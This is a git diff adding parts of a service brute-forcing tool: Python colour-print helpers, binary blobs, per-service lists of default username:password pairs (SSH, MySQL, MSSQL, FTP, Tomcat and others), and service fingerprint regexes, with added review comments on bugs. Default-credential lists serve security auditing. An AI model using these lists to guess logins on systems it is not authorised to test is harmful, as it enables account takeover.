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 literal 0 HcmV?d00001 diff --git a/Bruteforce/comm/printers.py b/Bruteforce/comm/printers.py new file mode 100644 index 0000000..8203b59 --- /dev/null +++ b/Bruteforce/comm/printers.py 
@@ -0,0 +1,78 @@ +import ctypes,sys +import platform + +if platform.system()=='Linux' or platform.system()=='Darwin': + class colors: + BLACK = '\033[0;30m' + DARK_GRAY = '\033[1;30m' + LIGHT_GRAY = '\033[0;37m' + BLUE = '\033[0;34m' + LIGHT_BLUE = '\033[1;34m' + GREEN = '\033[0;32m' + LIGHT_GREEN = '\033[1;32m' + CYAN = '\033[0;36m' + LIGHT_CYAN = '\033[1;36m' + RED = '\033[0;31m' + LIGHT_RED = '\033[1;31m' + PURPLE = '\033[0;35m' + LIGHT_PURPLE = '\033[1;35m' + BROWN = '\033[0;33m' + YELLOW = '\033[1;33m' + WHITE = '\033[1;37m' + DEFAULT_COLOR = '\033[00m' + RED_BOLD = '\033[01;31m' + ENDC = '\033[0m' + + def printRed(mess): + mess=mess.strip('\r\n') + print colors.RED + mess + colors.ENDC + + def printPink(mess): + mess=mess.strip('\r\n') + print colors.BLUE + mess+ colors.ENDC + + def printGreen(mess): + mess=mess.strip('\r\n') + print colors.GREEN + mess + colors.ENDC + + +if platform.system()=='Windows': + STD_INPUT_HANDLE = -10 + STD_OUTPUT_HANDLE = -11 + STD_ERROR_HANDLE = -12 + + FOREGROUND_BLACK = 0x0 + FOREGROUND_BLUE = 0x01 # text color contains blue. + FOREGROUND_GREEN = 0x02 # text color contains green. + FOREGROUND_RED = 0x04 # text color contains red. + + FOREGROUND_INTENSITY = 0x08 # text color is intensified. + BACKGROUND_BLUE = 0x10 # background color contains blue. + BACKGROUND_GREEN = 0x20 # background color contains green. + BACKGROUND_RED = 0x40 # background color contains red. + BACKGROUND_INTENSITY = 0x80 # background color is intensified. 
+ + + std_out_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE) + + def set_cmd_text_color(color, handle=std_out_handle): + Bool = ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color) + return Bool + + def resetColor(): + set_cmd_text_color(FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE) + + def printRed(mess): + set_cmd_text_color(FOREGROUND_RED | FOREGROUND_INTENSITY) + sys.stdout.write(mess) + resetColor() + + def printPink(mess): + set_cmd_text_color(FOREGROUND_RED | FOREGROUND_BLUE| FOREGROUND_INTENSITY) + print(mess) + resetColor() + + def printGreen(mess): + set_cmd_text_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY) + sys.stdout.write(mess) + resetColor() 
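Review bot: The print helpers are defined only when `platform.system()` is `Linux`, `Darwin` or `Windows`; on any other value this module defines none of them, and `from comm.printers import printPink,printRed,printGreen` in the other files fails with ImportError. Turning the second test into `elif platform.system()=='Windows':` and adding `else: printRed = printPink = printGreen = sys.stdout.write` keeps the package importable everywhere. The two implementations also behave differently: the POSIX versions strip `\r\n` and `print` with a newline, while the Windows `printRed` and `printGreen` use `sys.stdout.write(mess)` and only `printPink` uses `print(mess)`. The POSIX `printPink` emits `colors.BLUE` although `colors.PURPLE` is defined, which deserves a short comment or a rename.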
diff --git a/Bruteforce/comm/printers.pyc b/Bruteforce/comm/printers.pyc new file mode 100644 index 0000000000000000000000000000000000000000..1995bec4a4ac39e99e9b6dffaf74c50fc88d19de GIT binary patch literal 3280 zcmcImS#R4$5FS#JZTY^BxM+f+hk7EhdjM$>LtvN@a`?#|9P`^}Jv-{+=Jf2$rfY4A(n{uEbu-y+iZx2R3z zj&zG$YiPI0waK@sm7p6;u<6{UuoSZ-*wViyog}?YIz_LDXCAv4Pw>D^k)9M~g7lOq zlhmb{i?q1dw)8Z)Q>16eO_QD_cbfDZxih5a$(<#=K<*srMRMm!FOj=IdYRls(ktXH zkzOTtne-aDE94WkR;jf{t#$I#bOSsaSPl*1MN0)b$nY$A_v=q5OcoScMY zCP^;Rk|KAK)5Y*71^$%4PYZmc1@Ms;z(-mDA87%6qy_Mi7QjbZ03T^tk+iIms%2I< zhDnI+A0K|d`>-?6AH{UozZ=@2e?8POXQacv6SI$W*uRb0M>_0}V)l^^`!_NBNQZql zW{>NLjgyY}5&cx8AvCy5MuSdf4T|AMp4UC?_?~B`WzgyA%Qg?$L9U$5ADA?>LRKAk zMU_34Y32Q5sU8j4VXoY8Vs;tw@}hE_ikX2nT)<;qkw4B>Vk>0G<)xg0Y!}Vv5mV-{ zp$^NAnH@PA7$ihhJ*vp8W2aoM9!cCsrTw~N<}knD>}4C}x|gq(t4i>~sh6vk3lfJ@ zDdaPlMq?3v#>*a`{2Z8PmuDx3POW}&*1t6VPrZKAKWX+los)|`80`1MuP&~Yjp-an z_%XzU^)`P^W;$QIHjhizzCig&Q$gXq#Nk-fvI)iw))KT)ENMbv@tR7=a&9`qxfH~q z=?51Qi<*Z`Z9rsr3xV13!|AH)F|?ovlVSNE>M;4d`W;7=BRu)q@vm;nK& zG+?F#oY!EH#RC>kS^Nso?k{9Q_dtPhl;eM_{ON! zM?8ybZLg}FqN+A31&vpjocx}phWwRZAY4C-v_olzeJzFzw`te7v%`g zr+7HV!&rc+m84cm&XmU!{Ou8k$ixzeirbo5g@}RLuhgANZNGjDN7(o}I{47&-ldVF zyy^$WSG=(h<#rXUxankhBW4;|^VZ@UP;z06Q4UWHq%D>}q}Ska!ydy^d;*I5{+)%q z4QG3}1|ct7sW*gtyMy^;6!hn;eZk^O7I&3)?g0n5Vrh>^%jcoElPcahdOx&J4PKBP zDPJap--%ke%;jt-X(?PCwR*wZuN*e&UMX8C;KjZ)FjgD&m~}YSQL3tjQ(vnt`9O(| zPtw6;m4h@~aXEaw3@TH;NqBM07L_KKaLmXh%xsUDMr>F2@jyL*kZ+NqZ)!%DqF%*r zPyik(z>C^f#4kAvJiEmUYznJ?h`!67a03c=AU3U8`$KDGEuBm!XH(13cZWUr`WW7= PiNu;cn@lItsdVZe6|QQv literal 0 HcmV?d00001 diff --git a/Bruteforce/conf/.DS_Store b/Bruteforce/conf/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..5008ddfcf53c02e82d7eee2e57c38e5672ef89f6 GIT binary patch literal 6148 zcmeH~Jr2S!425mzP>H1@V-^m;4Wg<&0T*E43hX&L&p$$qDprKhvt+--jT7}7np#A3 zem<@ulZcFPQ@L2!n>{z**++&mCkOWA81W14cNZlEfg7;MkzE(HCqgga^y>{tEnwC%0;vJ&^%eQ zLs35+`xjp>T0 +[global] +task_type = 1 + + +[global] +logfile = ./log/log.txt 
diff --git a/Bruteforce/conf/ftp.conf b/Bruteforce/conf/ftp.conf
new file mode 100644
index 0000000..4ce1ad1
--- /dev/null
+++ b/Bruteforce/conf/ftp.conf
@@ -0,0 +1,72 @@
+ftp:ftp@163.com
+ftp:ftp
+ftp:1
+ftp:12
+ftp:123
+ftp:1234
+ftp:12345
+ftp:123456
+ftp:1234567
+ftp:12345678
+ftp:123456789
+ftp:1234567890
+ftp:654321
+ftp:54321
+ftp:00000000
+ftp:88888888
+ftp:pass
+ftp:password
+ftp:passwd
+ftp:!@#$%^
+ftp:1q2w3e
+ftp:qawsed
+ftp:pwd
+ftp:1qaz2ws3e4
+ftp:qazwsxedc
+ftp:!@#$%^&*
+ftp:ftp21
+ftp:ftppass
+ftp:ftp221
+ftp:ftppassword
+ftp:ftppasswd
+admin:1
+admin:12
+admin:admin
+admin:123
+admin:1234
+admin:12345
+admin:123456
+admin:1234567
+admin:12345678
+admin:123456789
+admin:1234567890
+admin:654321
+admin:54321
+admin:00000000
+admin:88888888
+admin:pass
+admin:password
+admin:passwd
+admin:!@#$%^
+admin:1q2w3e
+admin:qawsed
+admin:pwd
+admin:1qaz2ws3e4
+admin:qazwsxedc
+admin:!@#$%^&*
+admin:rootpass
+admin:rootpassword
+admin:rootpasswd
+test:1
+test:12
+test:123
+test:1234
+test:12345
+test:123456
+test:1234567
+test:12345678
+test:123123
+test:123456789
+test:test
+test:654321
+test:54321
\ No newline at end of file
diff --git a/Bruteforce/conf/ldapd.conf b/Bruteforce/conf/ldapd.conf
new file mode 100644
index 0000000..0c6e377
--- /dev/null
+++ b/Bruteforce/conf/ldapd.conf
@@ -0,0 +1,27 @@
+Anonymous:
+Manager:123456
+Manager:secret
+Manager:1
+Manager:12
+Manager:123
+Manager:1234
+Manager:12345
+Manager:123456
+Manager:1234567
+Manager:12345678
+Manager:123456789
+Manager:1234567890
+Manager:654321
+Manager:54321
+Manager:00000000
+Manager:88888888
+Manager:pass
+Manager:password
+Manager:passwd
+Manager:!@#$%^
+Manager:1q2w3e
+Manager:qawsed
+Manager:pwd
+Manager:1qaz2ws3e4
+Manager:qazwsxedc
+Manager:!@#$%^&*
\ No newline at end of file
diff --git a/Bruteforce/conf/mongodb.conf b/Bruteforce/conf/mongodb.conf
new file mode 100644
index 0000000..00db698
--- /dev/null
+++ b/Bruteforce/conf/mongodb.conf
@@ -0,0 +1,115 @@ +anonymous: +mongodb:1 +mongodb:12 +mongodb:123 +mongodb:1234 +mongodb:12345 +mongodb:123456 +mongodb:1234567 +mongodb:12345678 +mongodb:123456789 +mongodb:1234567890 +mongodb:654321 +mongodb:54321 +mongodb:mongodb +mongodb:00000000 +mongodb:88888888 +mongodb:pass +mongodb:password +mongodb:passwd +mongodb:!@#$%^ +mongodb:1q2w3e +mongodb:qawsed +mongodb:pwd +mongodb:1qaz2ws3e4 +mongodb:qazwsxedc +mongodb:!@#$%^&* +mongodb:rootpass +mongodb:rootpassword +mongodb:rootpasswd +root:1 +root:12 +root:root +root:root123 +root:root123456 +root:123 +root:1234 +root:12345 +root:123456 +root:1234567 +root:12345678 +root:123456789 +root:1234567890 +root:654321 +root:54321 +root:00000000 +root:88888888 +root:pass +root:password +root:passwd +root:!@#$%^ +root:1q2w3e +root:qawsed +root:pwd +root:test +root:qwe123 +root:1qaz2ws3e4 +root:qazwsxedc +root:!@#$%^&* +root:root123 +root:root123456 +root:rootpass +root:rootpassword +root:rootpasswd +root:admin +root:admin123 +root:- +root:_ +root:1qaz2wsx +root:666666 +root:888888 +root:123123 +root:toor +root:123abc +root:passw0rd +admin:1 +admin:12 +admin:admin +admin:123 +admin:1234 +admin:12345 +admin:123456 +admin:1234567 +admin:12345678 +admin:123456789 +admin:1234567890 +admin:654321 +admin:54321 +admin:00000000 +admin:88888888 +admin:pass +admin:password +admin:passwd +admin:!@#$%^ +admin:1q2w3e +admin:qawsed +admin:pwd +admin:1qaz2ws3e4 +admin:qazwsxedc +admin:!@#$%^&* +admin:rootpass +admin:rootpassword +admin:rootpasswd +test:1 +test:12 +test:123 +test:1234 +test:12345 +test:123456 +test:1234567 +test:123123 +test:12345678 +test:123456789 +test:test +test:654321 +test:54321 \ No newline at end of file diff --git a/Bruteforce/conf/mssql.conf b/Bruteforce/conf/mssql.conf new file mode 100644 index 0000000..8c8042a --- /dev/null +++ b/Bruteforce/conf/mssql.conf 
@@ -0,0 +1,33 @@ +sa:1 +sa: +sa:sa +sa:sa123 +sa:12 +sa:123 +sa:1234 +sa:12345 +sa:123456 +sa:1234567 +sa:12345678 +sa:123456789 +sa:1234567890 +sa:654321 +sa:54321 +sa:00000000 +sa:88888888 +sa:pass +sa:password +sa:passwd +sa:!@#$%^ +sa:1q2w3e +sa:qawsed +sa:pwd +sa:1qaz2ws3e4 +sa:qazwsxedc +sa:!@#$%^&* +sa:sa1433 +sa:sapass +sa:sa1434 +sa:sapassword +sa:sapasswd +sa:aS6kR9auNM diff --git a/Bruteforce/conf/mysql.conf b/Bruteforce/conf/mysql.conf new file mode 100644 index 0000000..1ebee22 --- /dev/null +++ b/Bruteforce/conf/mysql.conf @@ -0,0 +1,75 @@ +root:1 +root:12 +root:123 +root:1234 +root:12345 +root:123456 +root:1234567 +root:12345678 +root:123456789 +root:1234567890 +root:654321 +root:54321 +root:00000000 +root:88888888 +root: +root:root +root:root123 +root:root123456 +root:pass +root:password +root:passwd +root:!@#$%^ +root:1q2w3e +root:qawsed +root:pwd +root:1qaz2ws3e4 +root:qazwsxedc +root:!@#$%^&* +root:root3306 +root:rootpass +root:root3307 +root:rootpassword +root:rootpasswd +mysql:1 +mysql:12 +mysql:123 +mysql:1234 +mysql:12345 +mysql:123456 +mysql:1234567 +mysql:12345678 +mysql:123456789 +mysql:1234567890 +mysql:654321 +mysql:54321 +mysql:00000000 +mysql:mysql +mysql:88888888 +mysql:pass +mysql:password +mysql:passwd +mysql:!@#$%^ +mysql:1q2w3e +mysql:qawsed +mysql:pwd +mysql:1qaz2ws3e4 +mysql:qazwsxedc +mysql:!@#$%^&* +mysql:root3306 +mysql:rootpass +mysql:root3307 +mysql:rootpassword +mysql:rootpasswd +test:1 +test:123123 +test:12 +test:123 +test:1234 +test:12345 +test:123456 +test:1234567 +test:12345678 +test:123456789 +test:test +test:654321 \ No newline at end of file diff --git a/Bruteforce/conf/pop3.conf b/Bruteforce/conf/pop3.conf new file mode 100644 index 0000000..e69de29 diff --git a/Bruteforce/conf/postgres.conf b/Bruteforce/conf/postgres.conf new file mode 100644 index 0000000..2ba2c9f --- /dev/null +++ b/Bruteforce/conf/postgres.conf 
@@ -0,0 +1,64 @@ +root:1 +root:12 +root:123 +root:x90x00 +root:1234 +root:12345 +root:123456 +root:1234567 +root:12345678 +root:123456789 +root:1234567890 +root:654321 +root:54321 +root:00000000 +root:88888888 +root:root +root:root123 +root:root123456 +root:pass +root:motianlun +root:mofashi +root:password +root:passwd +root:!@#$%^ +root:1q2w3e +root:qawsed +root:pwd +root:1qaz2ws3e4 +root:qazwsxedc +root:!@#$%^&* +root:root3306 +root:rootpass +root:root3307 +root:rootpassword +root:rootpasswd +postgres:1 +postgres:12 +postgres:123 +postgres:1234 +postgres:12345 +postgres:123456 +postgres:1234567 +postgres:12345678 +postgres:123456789 +postgres:1234567890 +postgres:postgres +postgres:654321 +postgres:54321 +postgres:88888888 +postgres:pass +postgres:password +postgres:passwd +postgres:!@#$%^ +postgres:1q2w3e +postgres:qawsed +postgres:pwd +postgres:1qaz2ws3e4 +postgres:qazwsxedc +postgres:!@#$%^&* +postgres:postgres654321 +postgres:postgres123456 +postgres:postgres123 +postgres:postgrespassword +postgres:postgrespasswd \ No newline at end of file diff --git a/Bruteforce/conf/signs.conf b/Bruteforce/conf/signs.conf new file mode 100644 index 0000000..080e022 --- /dev/null +++ b/Bruteforce/conf/signs.conf 
@@ -0,0 +1,80 @@ +http|^HTTP.* +http|^HTTP/0. +http|^HTTP/1. +http|.* +http|.* +http|.* +http|Bad Request .Invalid URL. +redis|ERR unknown command +redis|ERR wrong number of arguments +mongodb|^.*version.....([\.\d]+) +pop3|.*POP3.* +pop3|.*pop3.* +ssh|SSH-2.0-OpenSSH.* +ssh|SSH-1.0-OpenSSH.* +ssh|.*ssh.* +backdoor-fxsvc|^500 Not Loged in +backdoor-shell|GET: command +backdoor-shell|sh: GET: +bachdoor-shell|[a-z]*sh: .* command not found +backdoor-shell|^bash[$#] +backdoor-shell|^sh[$#] +backdoor-cmdshell|^Microsoft Windows .* Copyright .*> +ftp|^220.*\n331 +ftp|^220.*\n530 +ftp|^220.*FTP +ftp|^220 .* Microsoft .* FTP +ftp|^220 Inactivity timer +ftp|^220 .* UserGate +ftp|^220(.*?) +ldap|^\x30\x0c\x02\x01\x01\x61 +ldap|^\x30\x32\x02\x01 +ldap|^\x30\x33\x02\x01 +ldap|^\x30\x38\x02\x01 +ldap|^\x30\x84 +ldap|^\x30\x45 +ldap|^\x30.* +smb|^\0\0\0.\xffSMBr\0\0\0\0.* +mssql|^\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.* +mssql|^\x05\x6e\x00 +mssql|^\x04\x01\x00\x25\x00\x00\x01\x00\x00\x00\x15.* +mssql|^\x04\x01\x00.\x00\x00\x01\x00\x00\x00\x15.* +mssql|^\x04\x01\x00\x25\x00\x00\x01\x00\x00\x00\x15.* +mssql|^\x04\x01\x00.\x00\x00\x01\x00\x00\x00\x15.* +mssql|^\x04\x01\0\x25\0\0\x01\0\0\0\x15\0\x06\x01.* +mssql|^\x04\x01\x00\x25\x00\x00\x01.* +mysql|^\x19\x00\x00\x00\x0a +mysql|^\x2c\x00\x00\x00\x0a +mysql|hhost \' +mysql|khost \' +mysql|mysqladmin +mysql|(.*)5(.*)log +mysql|(.*)4(.*)log +mysql|whost \' +mysql|^\(\x00\x00 +mysql|this MySQL +mysql|^N\x00 +mysql|(.*)mysql(.*) +mssql|;MSSQLSERVER; +oracle|\(ERROR_STACK=\(ERROR=\(CODE= +oracle|\(ADDRESS=\(PROTOCOL= +postgres|Invalid packet length +postgres|^EFATAL +rsync|^@RSYNCD:.* +snmp|\x70\x75\x62\x6c\x69\x63\xa2 +snmp|\x41\x01\x02 +ssh|^SSH- +ssh|^SSH-.*openssh +telnet|^\xff\xfd +telnet-disabled|Telnet is disabled now +telnet|^\xff\xfe +telnet|^xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd.* +vnc|^RFB.*' diff --git a/Bruteforce/conf/smb.conf b/Bruteforce/conf/smb.conf new file mode 100644 index 0000000..1ed9085 --- /dev/null 
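Review bot: The label on the pattern `[a-z]*sh: .* command not found` is spelled `bachdoor-shell`, unlike the `backdoor-shell` rules around it. Assuming the text before `|` is the reported service name, a match would be filed under a name no other rule uses; it should read `backdoor-shell|[a-z]*sh: .* command not found`. The last telnet pattern starts `^xff\xfb\x01` without the backslash the other byte escapes carry, so it matches the literal text "xff" rather than a single byte; `telnet|^\xff\xfb\x01…` looks intended. The mssql block also lists `^\x04\x01\x00\x25\x00\x00\x01\x00\x00\x00\x15.*` and its `.`-wildcard variant twice each, and one copy of each is enough.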
+++ b/Bruteforce/conf/smb.conf @@ -0,0 +1,67 @@ +administrator:1 +administrator:12 +administrator: +administrator:administrator +administrator:123 +administrator:1234 +administrator:12345 +administrator:123456 +administrator:1234567 +administrator:12345678 +administrator:123456789 +administrator:1234567890 +administrator:654321 +administrator:54321 +administrator:00000000 +administrator:88888888 +administrator:pass +administrator:password +administrator:passwd +administrator:!@#$%^ +administrator:1q2w3e +administrator:qawsed +administrator:pwd +administrator:1qaz2ws3e4 +administrator:qazwsxedc +administrator:!@#$%^&* +admin:1 +admin:12 +admin:admin +admin:123 +admin:1234 +admin:12345 +admin:123456 +admin:1234567 +admin:12345678 +admin:123456789 +admin:1234567890 +admin:654321 +admin:54321 +admin:00000000 +admin:88888888 +admin:pass +admin:password +admin:passwd +admin:!@#$%^ +admin:1q2w3e +admin:qawsed +admin:pwd +admin:1qaz2ws3e4 +admin:qazwsxedc +admin:!@#$%^&* +admin:rootpass +admin:rootpassword +admin:rootpasswd +test:1 +test:123123 +test:12 +test:123 +test:1234 +test:12345 +test:123456 +test:1234567 +test:12345678 +test:123456789 +test:test +test:654321 +test:54321 \ No newline at end of file diff --git a/Bruteforce/conf/snmp.conf b/Bruteforce/conf/snmp.conf new file mode 100644 index 0000000..d70ebaa --- /dev/null +++ b/Bruteforce/conf/snmp.conf @@ -0,0 +1 @@ +public \ No newline at end of file diff --git a/Bruteforce/conf/ssh.conf b/Bruteforce/conf/ssh.conf new file mode 100644 index 0000000..e5e62af --- /dev/null +++ b/Bruteforce/conf/ssh.conf 
@@ -0,0 +1,86 @@ +root:1 +root:12 +root:root +root:root123 +root:root123456 +root:123 +root:1234 +root:12345 +root:123456 +root:1234567 +root:12345678 +root:123456789 +root:1234567890 +root:654321 +root:54321 +root:00000000 +root:88888888 +root:pass +root:password +root:passwd +root:!@#$%^ +root:1q2w3e +root:qawsed +root:pwd +root:test +root:qwe123 +root:1qaz2ws3e4 +root:qazwsxedc +root:!@#$%^&* +root:root123 +root:root123456 +root:rootpass +root:rootpassword +root:rootpasswd +root:admin +root:admin123 +root:- +root:_ +root:1qaz2wsx +root:666666 +root:888888 +root:123123 +root:toor +root:123abc +root:passw0rd +admin:1 +admin:12 +admin:admin +admin:123 +admin:1234 +admin:12345 +admin:123456 +admin:1234567 +admin:12345678 +admin:123456789 +admin:1234567890 +admin:654321 +admin:54321 +admin:00000000 +admin:88888888 +admin:pass +admin:password +admin:passwd +admin:!@#$%^ +admin:1q2w3e +admin:qawsed +admin:pwd +admin:1qaz2ws3e4 +admin:qazwsxedc +admin:!@#$%^&* +admin:rootpass +admin:rootpassword +admin:rootpasswd +test:1 +test:12 +test:123 +test:1234 +test:123123 +test:12345 +test:123456 +test:1234567 +test:12345678 +test:123456789 +test:test +test:654321 +test:54321 diff --git a/Bruteforce/conf/tomcat.conf b/Bruteforce/conf/tomcat.conf new file mode 100644 index 0000000..4eb9405 --- /dev/null +++ b/Bruteforce/conf/tomcat.conf 
@@ -0,0 +1,69 @@ +tomcat:1 +tomcat:12 +tomcat:tomcat +tomcat:tomcat123 +tomcat:tomcat123456 +tomcat:123 +tomcat:1234 +tomcat:12345 +tomcat:123456 +tomcat:1234567 +tomcat:12345678 +tomcat:123456789 +tomcat:1234567890 +tomcat:654321 +tomcat:54321 +tomcat:00000000 +tomcat:88888888 +tomcat:pass +tomcat:password +tomcat:passwd +tomcat:!@#$%^ +tomcat:1q2w3e +tomcat:qawsed +tomcat:pwd +tomcat:1qaz2ws3e4 +tomcat:qazwsxedc +tomcat:!@#$%^&* +tomcat:s3cret +admin:1 +admin:12 +admin:admin +admin:123 +admin:1234 +admin:12345 +admin:123456 +admin:1234567 +admin:12345678 +admin:123456789 +admin:1234567890 +admin:654321 +admin:54321 +admin:00000000 +admin:88888888 +admin:pass +admin:password +admin:passwd +admin:!@#$%^ +admin:1q2w3e +admin:qawsed +admin:pwd +admin:1qaz2ws3e4 +admin:qazwsxedc +admin:!@#$%^&* +admin:rootpass +admin:rootpassword +admin:rootpasswd +test:1 +test:12 +test:123 +test:1234 +test:12345 +test:123456 +test:1234567 +test:123123 +test:12345678 +test:123456789 +test:test +test:654321 +test:54321 \ No newline at end of file diff --git a/Bruteforce/conf/vnc.conf b/Bruteforce/conf/vnc.conf new file mode 100644 index 0000000..9d690c9 --- /dev/null +++ b/Bruteforce/conf/vnc.conf @@ -0,0 +1,34 @@ +root +vnc +vnc123 +vncpass +vnc123456 +vncpassword +vncpasswd +123 +1234 +12345 +123456 +1234567 +12345678 +123456789 +1234567890 +654321 +rootpass +54321 +00000000 +88888888 +pass +password +passwd +!@#$%^ +1q2w3e +qawsed +pwd +1qaz2ws3e4 +qazwsxedc +!@#$%^&* +root123 +root123456 +rootpassword +rootpasswd \ No newline at end of file diff --git a/Bruteforce/conf/web.conf b/Bruteforce/conf/web.conf new file mode 100644 index 0000000..b4db38f --- /dev/null +++ b/Bruteforce/conf/web.conf 
